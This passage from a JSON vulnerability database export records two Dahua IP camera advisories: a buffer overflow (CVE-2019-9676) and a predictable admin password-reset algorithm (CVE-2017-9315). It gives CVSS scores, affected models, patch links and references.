                "userInteractionRequired": false,
                "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Local",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 7.2,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "CVE-2019-9676",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.2,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 3.9,
                "id": "CNVD-2019-17496",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "LOCAL",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 7.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.8,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Local",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-9676",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "Low",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-9676",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-17496",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201906-556",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-17496"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005507"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-9676"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-556"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Buffer overflow vulnerability found in some Dahua IP Camera devices IPC-HFW1XXX,IPC-HDW1XXX,IPC-HFW2XXX Build before 2018/11. The vulnerability exits in the function of redirection display for serial port printing information, which can not be used by product basic functions. After an attacker logs in locally, this vulnerability can be exploited to cause device restart or arbitrary code execution. Dahua has identified the corresponding security problems in the static code auditing process, so it has gradually deleted this function, which is no longer available in the newer devices and softwares. Dahua has released versions of the affected products to fix the vulnerability. Dahua IPC-HFW1XXX , IPC-HDW1XXX , IPC-HFW2XXX The device contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. DahuaIPC-HFW1XXX and so on are all IP cameras from Dahua, China",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-9676"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005507"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-17496"
          }
        ],
        "trust": 2.16
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-9676",
            "trust": 3.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005507",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-17496",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-556",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-17496"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005507"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-9676"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-556"
          }
        ]
      },
      "id": "VAR-201906-0243",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-17496"
          }
        ],
        "trust": 1.1944444333333335
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-17496"
          }
        ]
      },
      "last_update_date": "2023-12-18T14:05:08.331000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Security Advisory - Buffer overflow vulnerability found in some Dahua IP Camera devices",
            "trust": 0.8,
            "url": "https://www.dahuasecurity.com/support/cybersecurity/details/617"
          },
          {
            "title": "Patch for DahuaIPC-HFW1XXX, IPC-HDW1XXX, and IPC-HFW2XXX Buffer Overflow Vulnerabilities",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/163559"
          },
          {
            "title": "Dahua IPC-HFW1XXX , IPC-HDW1XXX  and IPC-HFW2XXX Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=93789"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-17496"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005507"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-556"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005507"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-9676"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://www.dahuasecurity.com/support/cybersecurity/details/617"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-9676"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9676"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-17496"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005507"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-9676"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-556"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-17496"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005507"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-9676"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-556"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-06-11T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-17496"
          },
          {
            "date": "2019-06-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005507"
          },
          {
            "date": "2019-06-12T15:29:00.957000",
            "db": "NVD",
            "id": "CVE-2019-9676"
          },
          {
            "date": "2019-06-12T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-556"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-06-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-17496"
          },
          {
            "date": "2019-06-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005507"
          },
          {
            "date": "2019-06-17T19:13:22.717000",
            "db": "NVD",
            "id": "CVE-2019-9676"
          },
          {
            "date": "2019-06-18T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-556"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "local",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-556"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Dahua IP Camera Buffer error vulnerability in product devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005507"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-556"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201711-1047

    Vulnerability from variot - Updated: 2023-12-18 13:57

    Customer of Dahua IP camera or IP PTZ could submit relevant device information to receive a time limited temporary password from Dahua authorized dealer to reset the admin password. The algorithm used in this mechanism is potentially at risk of being compromised and subsequently utilized by attacker. Dahua IP Camera and IP PTZ Contains a cryptographic vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Dahua Technology IP Camera. Authentication is not required to exploit this vulnerability.The specific flaw exists within the disaster recovery password functionality. If the device uses its default settings, the password generation algorithm produces a predictable result. An attacker can leverage this vulnerability to gain control of the device under attack. Dahua IPC-HFW and others are network camera equipment of Dahua Company of China. There are security vulnerabilities in several Dahua products. An attacker could use this vulnerability to reset the administrator password. Dahua IPC-HFW, etc. The following products are affected: Dahua IPC-HFW1XXX Build 2015/07 to 2017/03; IPC-HDW1XXX Build 2015/07 to 2017/03; IPC-HDBW1XXX Build 2015/07 to 2017/03; IPC- HFW2XXX Build 2015/07 to 2017/03; IPC-HDW2XXX Build 2015/07 to 2017/03; IPC-HDBW2XXX Build 2015/07 to 2017/03; IPC-HFW4XXX Build 2015/07 to 2017 /03 version; IPC-HDW4XXX Build 2015/07 to 2017/03 version; IPC-HDBW4XXX Build 2015/07 to 2017/03 version; IPC-HF5XXX Build 2015/07 to 2017/03 version; IPC-HFW5XXX Build 2015/07 to 2017/03; IPC-HDW5XXX Build 2015/07 to 2017/03; IPC-HDBW5XXX Build 2015/07 to 2017/03; IPC-HF8XXX Build 2015/07 to 2017/03 Version; IPC-HFW8XXX Build 2015/07 to 2017/03; IPC-HDBW8XXX Build 2015/07 to 2017/03; IPC-EBW8XXX Build 2015/07 to 2017/03; IPC-PFW8xxx Build 2015/ 07 version to 2017/03 version; IPC-PDBW8xxx Build 2015/07 version to 2017/03 version; IPC-HUM8xxx Build 2015/07 version to 2017/03 version

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201711-1047",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ipc-hfw1xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-hfw2xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-hf5xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-hfw4xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-hdbw2xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-hdw2xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-hdw4xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-hdbw1xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-hdw1xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-hdbw4xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-sd5xxxxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-hdbw8xxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-hdbw5xxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-sd2xxxxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-sd4xxxxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-ebw8xxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-pdbw8xxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-hum8xxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-pfw8xxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-hdw5xxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-sd6xxxxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-hfw8xxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-hf8xxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "psd8xxxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "ipc-hfw5xxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-ipc-hdw1xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hdw2xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hdw4xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hfw1xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-sd2xxxxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-sd4xxxxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-sd5xxxxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-sd6xxxxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-ebw8xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw1xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw2xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw4xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw5xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw8xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdw5xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hf5xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hf8xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hfw2xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hfw4xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hfw5xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hfw8xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hum8xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-pdbw8xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-pfw8xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "psd8xxxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ip camera",
            "scope": null,
            "trust": 0.7,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security ipc-hf5xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-hfw5xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-hdw5xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-hdbw5xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-hf8xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-hfw8xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-hdbw8xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-ebw8xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-pfw8xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-pdbw8xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-hum8xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security psd",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-hfw1xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-hdw1xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-hdbw1xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-hfw2xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-hdw2xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-hdbw2xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-hfw4xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security ipc-hdw4xxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security dh-sd6xxxxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security dh-sd5xxxxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security dh-sd4xxxxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          },
          {
            "model": "security dh-sd2xxxxx",
            "scope": "gte",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2015/07,\u003c=2017/03"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-18-130"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-38224"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011143"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9315"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1393"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw1xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw1xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw1xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdw1xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw1xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw1xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw2xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdw2xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
